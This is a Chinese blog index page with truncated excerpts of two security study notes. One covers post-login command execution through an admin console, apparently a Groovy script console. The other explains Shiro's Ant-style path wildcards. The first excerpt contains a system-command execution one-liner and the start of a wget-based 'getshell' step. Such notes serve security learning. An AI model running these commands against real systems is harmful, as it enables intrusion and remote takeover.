摘要:
昨天晚上面试官问到了,还没来得及看,今天又问到了,猝不及防,蓝瘦,香菇、、、 今天特此总结一下,给自己一个交代。 总述:进入后台可进行如下操作: 直接执行系统命令: println "cmd".execute().text wget下载文件getshell: println "wget http:/ 阅读全文
posted @ 2020-11-22 16:48
komomon
阅读(4424)
评论(0)
推荐(0)
摘要:
##简述: shiro框架通过拦截功能来实现对用户访问权限的控制和拦截,shiro里面支持Ant风格的通配符。 ?:匹配任意的一个字符,例如:"/admin?"可以匹配“/admin1”,"/admin2"。 *:匹配一个或者多个任意的字符。 **:匹配零个或者多个目录。 设置路径通配符: [mai 阅读全文
posted @ 2020-11-22 15:33
komomon
阅读(2853)
评论(0)
推荐(0)
浙公网安备 33010602011771号